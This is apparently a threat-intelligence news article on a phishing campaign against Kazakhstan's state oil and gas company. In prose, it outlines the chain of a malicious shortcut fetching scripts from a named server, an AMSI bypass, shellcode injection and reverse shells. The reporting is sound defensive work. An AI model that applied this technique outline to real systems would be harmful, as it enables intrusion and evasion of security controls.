Anatomy of a Cyberattack: Inside the Campaign Against Kazakhstan’s Energy Sector

The Seqrite Labs APT-Team has uncovered a new campaign targeting Kazakhstan’s energy sector. Tracked since April 2025, the operation has been attributed to a previously unknown group, now dubbed NoisyBear. Its primary victim was the national oil and gas company KazMunaiGas (KMG). Attackers sent employees emails from spoofed corporate addresses, disguising them as announcements about staffing changes and payroll. The attachments mimicked internal IT documents, written in both Russian and Kazakh, adorned with the KMG logo, and marked with an urgent request to “verify data by May 15, 2025.”

The initial infection vector was a ZIP archive named “График.zip” (“Schedule.zip”), containing three items: a text file with instructions, a counterfeit document, and a shortcut titled “График зарплат.lnk” (“Salary Schedule.lnk”). The shortcut executed a PowerShell command that retrieved a batch script from a remote server at 77.239.125.41:8443, saving it into a public Windows directory where it would run automatically. Analysts found several variations of these shortcuts designed to bypass static detection, though all traced back to the same server.

The next stage involved executing batch scripts such as 123.bat and it.bat. These fetched PowerShell modules collectively referred to as DOWNSHELL. One script disabled native Windows security features by modifying internal .NET parameters to bypass AMSI. Another injected shellcode directly into the explorer.exe process. To achieve this, attackers leveraged PowerSploit functions, enabling direct WinAPI access to implant malicious code into memory without relying on standard calls. Meterpreter reverse shells were employed through the classic CreateRemoteThread Injection technique, while code fragments also hinted at preparations for Reflective DLL Injection, again using PowerSploit-based libraries.

The final stage featured a DLL implant—a 64-bit loader that regulated the number of active instances using semaphores and named objects. For stealth, the implant spawned a new rundll32.exe process in a suspended state, injected shellcode by altering thread context, and then resumed execution. Once active, the process connected back to a C2 server, granting attackers persistent access to the system.

The NoisyBear infrastructure itself is noteworthy. Some servers were hosted by Aeza Group LLC, a provider already under sanctions. Alongside malicious tools, the infrastructure housed open-source red-team frameworks such as PowerSploit and Metasploit, as well as decoy websites themed around fitness and healthcare for Russian-speaking users.

The campaign, codenamed Operation BarrelFire, showcases the full cycle of a targeted attack: from email account compromise and phishing distribution to advanced code injection and evasion of built-in defenses. Its focus on Kazakhstan’s state-owned oil and gas giant underscores the campaign’s strategic intent, suggesting potential political or economic motivations behind NoisyBear’s activities.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy